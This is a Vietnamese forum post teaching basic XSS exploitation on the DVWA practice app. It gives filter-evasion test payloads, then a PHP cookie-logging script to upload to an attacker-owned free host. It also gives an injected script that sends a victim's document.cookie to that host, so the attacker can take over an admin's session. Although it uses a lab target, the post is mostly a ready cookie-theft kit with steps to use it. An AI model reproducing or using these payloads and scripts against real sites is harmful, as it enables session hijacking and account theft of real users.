Hướng cách khai thác lỗ hổng XSS (cơ bản).

StarWar

Intern
Khai thác lỗ hổng XSS với Xenotix (DVWA)

Xenotix XSS Exploit Framework là một công cụ thử nghiệm xâm nhập để phát hiện và khai thác lỗ hổng XSS trong ứng dụng web. Công cụ này có thể tiêm các đoạn mã và một trang web mà nó có khả năng bị tổn thương tới lỗ hổng XSS. Nó là cơ bản là một danh sách các payload dựa trên các XSS Scanner và XSS Exploitation. Nó cung cấp cho người thử nghiệm xâm nhập khả năng để kiểm tra tất cả các XSS payloads có sẵn trong danh sách để tấn công ,ứng dụng web cho quá trình kiểm tra lỗ hổng XSS. Công cụ hỗ trợ cả chế độ tự động và chế độ bằng tay. XSS Exploit Framework bao gồm các công cụ XSS encoder, XSS keystroke logger, Executable Drive-by downloader, XSS Reverse Shell và XSS DDoSer.



****Dưới đây là cách khai thác lỗ hổng XSS (cơ bản).

**Phần 1:Test lỗi.

1.Đầu tiên ta cần cài đặt DVWA.Link hướng dẫn ở đây http://svuit.com/showthread.php?109-Tạo-Penetration-testing-lab-with-DVWA.

2.Sau đó ta vào thư mục cài đặt DVWA

Tìm file .htaccess edit lai :

# Limit access to localhost
<Limit GET POST PUT>
order deny,allow
deny from all ---------> Sửa thành allow from all
allow from 127.0.0.1
</Limit>


3.Tìm file index.php theo đường dẫn sau: dvwa\vulnerabilities\xss-s\index.phptìm:

<div class=\"body_padded\"> -----> <textarea name=\"mtxMessage\" cols=\"50\" rows=\"3\" maxlength=\"50\"></textarea></td>

sửa maxlength từ 50 thành 200 nhu:

<textarea name=\"mtxMessage\" cols=\"50\" rows=\"3\" maxlength=\"200\"></textarea></td>

4.Vào web browser mở http://www.localhost/dvwa login vs username: admin password: password(mặc định nếu mốn ta có thể thay đổi sau).

5.Vào setup->Creat/reset database để tạo mới database nếu thành công thì sẽ có thông báo: database has been created....

6.Chỉnh DVWA security từ high xuống low.Đây là mức bảo mật thấp nhất.Ta nên bắt đầu từ đây.

7.Vào xss storage

8.Sử dụng một số đoạn script cơ bản để soát lỗi xss cho website:

<script>alert("XSS")</script>

"><script>alert("XSS")</script>

"><script>alert(String.fromCharCode(88,83,83)</script>

'><script>alert("XSS")</script>

'><script>alert(String.fromCharCode(88,83,83)</script>

<ScRIPt>aLeRT("XSS")</ScRIPt>

<ScRIPt><aLeRT(String.fromCharCode(88,83,83)</ScRIPt>
Sau khi phát hiên ra những lỗ hổng ta chuyển qua phần 2.

Phần 2.Sau khi phát hiện ra lỗi ta tấn công bang css


12*1.Tạo file cc.php để lấy cookies

Nội dung file cc.php nhu sau:

Mã:
<?php
$cookie=$HTTP_GET_VAR["cookie"];  [COLOR="#0000FF"]//Lấy cookie từ địa chỉ hiện tại và lưu trữ cookie trong biến $cookie[/COLOR]
$steal=fopen("logs.txt","a");              [COLOR="#0000FF"] //Mở cookiefile để đính kèm các cookie lấy được[/COLOR]
fwrite($steal,$cookie."\n");                [COLOR="#0000FF"]//Viết lại những cookie lấy được lưu trong file $steal[/COLOR]
fclose($steal);                                 [COLOR="#0000FF"]//Đóng lại cookiefiles.[/COLOR]
?>

file này có nhiệm vụ lấy cookies và ghi thông tin lên file logs.txt

Sau đó tạo file logs.txt.
Lưu ý phải chmod file logs.text về 777

12*2.Up các file cc.php và logs.text lên host

(Lưu ý đây là host do attacker tạo ra. Các bạn có thể tạo host free trên trang www.000webhost.com)


12*3.Khai thác lỗ hổng css

Chèn đoạn script độc vào textbox rồi gửi đi.

Giả sử ta upload 2 file lên host của site có địa chỉ như sau: http://www.xss.com thì đoạn script có dạng như sau:

<script>location.href='http://www.xss.com/cc.php?cookie='+document.cookie;</script>

Chèn đoạn mã đó vào site dính lỗi xss.Khi admin view site thi cookie se duoc gui ve cho attacker.

Kiểm tra file log trên web.

Bước cuối cùng.Khai thác cookies lấy được.​
 
Sửa lần cuối:
Bài viết liên quan
Bài 1: XSS bởi root,
Bài viết mới
Bài 1: XSS bởi root,
Back
Top